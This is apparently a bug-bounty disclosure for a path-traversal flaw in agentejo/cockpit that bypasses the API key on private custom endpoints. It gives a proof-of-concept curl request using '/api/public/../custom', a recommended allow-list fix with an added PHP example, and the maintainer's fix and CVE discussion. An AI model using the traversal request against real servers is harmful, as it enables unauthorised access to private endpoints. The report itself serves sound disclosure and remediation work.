Improper Access Control in agentejo/cockpit

Status: Valid

Reported on Sep 9th 2021


✍️ Description

A local file inclusion vulnerability (path traversal through the API route's 'path' parameter) allows attackers to bypass the API key requirement when querying private custom API endpoints.

🕵️‍♂️ Proof of Concept

  1. On the server, create a custom API endpoint in /var/www/html/config/api/custom.php as follows:

<?php

// very simple code here

$test = $this->param('test');

if (!$test) {
    return false;
}

return $test;

  2. Then execute the following command, replacing IP:Port with your server:

curl --path-as-is http://10.0.2.15:8080/api/public/../custom?test=win

You should see 'win' echoed back, which shows that custom.php in the api directory can be reached without an API token.

💥 Impact

Attackers do not require API tokens to access private custom API endpoints.

Recommended Fix

For the 'path' parameter in the following file, https://github.com/agentejo/cockpit/blob/568b0124352f6d27df359e8c19a70d2dd1961e87/modules/Cockpit/rest-api.php#L117L123, use a regex that allows only alphanumeric characters, '/' and '_', so that traversal segments such as '../' are rejected before the endpoint file is resolved.

📍 Location rest-api.php#L117L123
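As an added example (not the cockpit project's code and not the content of its fix commit), the allow-list the recommended fix describes, written as a standalone PHP function with a realpath containment check as a second layer; the function names, the temporary directory layout and the API-directory path are assumptions:

```php
<?php
// Added example, not cockpit's own code: a strict allow-list for the custom API
// 'path' parameter plus a realpath containment check. Names and paths are assumed.

/**
 * Return the endpoint file for $path, or null if the path is rejected.
 * $apiDir is the custom API directory (e.g. config/api); $path is the request
 * tail after /api/, such as "public/hello" or "public/../custom".
 */
function resolveCustomEndpoint(string $apiDir, string $path): ?string
{
    // Allow-list: letters, digits, '/' and '_' only. '.' is excluded, so any
    // "../" traversal segment is rejected before the filesystem is touched.
    if (!preg_match('#^[A-Za-z0-9_/]+$#', $path)) {
        return null;
    }
    // Reject empty segments ("public//hello") and leading/trailing slashes.
    if ($path !== trim($path, '/') || strpos($path, '//') !== false) {
        return null;
    }

    $real = realpath($apiDir . '/' . $path . '.php');
    $base = realpath($apiDir);

    // Defence in depth: the resolved file must still live under the API directory.
    if ($real === false || $base === false || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $real;
}

/** True if the request may run without an API token (only the public/ tree). */
function isPublicEndpoint(string $path): bool
{
    return strpos($path, 'public/') === 0;
}

// Constructed demo layout in a temporary directory (assumed, not a real install).
$apiDir = sys_get_temp_dir() . '/cockpit_api_demo';
@mkdir($apiDir . '/public', 0700, true);
file_put_contents($apiDir . '/custom.php', "<?php return 'private';");
file_put_contents($apiDir . '/public/hello.php', "<?php return 'hello';");

foreach (['public/hello', 'public/../custom', 'custom'] as $p) {
    $file = resolveCustomEndpoint($apiDir, $p);
    if ($file === null) {
        printf("%-18s -> rejected\n", $p);
    } else {
        printf("%-18s -> %s (%s)\n", $p, basename($file),
               isPublicEndpoint($p) ? 'public, no token needed' : 'private, token required');
    }
}
```

The traversal path from the proof of concept fails the allow-list and never reaches the filesystem, while the legitimate public and private endpoints still resolve and keep their respective token rules.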

We have contacted a member of the agentejo/cockpit team and are waiting to hear back (3 months ago)
haxatron modified their report (3 months ago)
agentejo/cockpit maintainer (Maintainer), 3 months ago:

should be fixed with this commit: https://github.com/agentejo/cockpit/commit/f1919184998bf9fa7a7db882c98ce1410375e596

haxatron (Researcher), 3 months ago:

Hi there! Thanks! Could you validate the report?

Artur validated this vulnerability (3 months ago)
haxatron has been awarded the disclosure bounty
The fix bounty is now up for grabs
Artur confirmed that a fix has been merged on f19191 (3 months ago)
Artur has been awarded the fix bounty
Jamie Slome (Admin), 2 months ago:

@maintainer - the researcher has requested a CVE. Are you also happy for a CVE to be assigned here?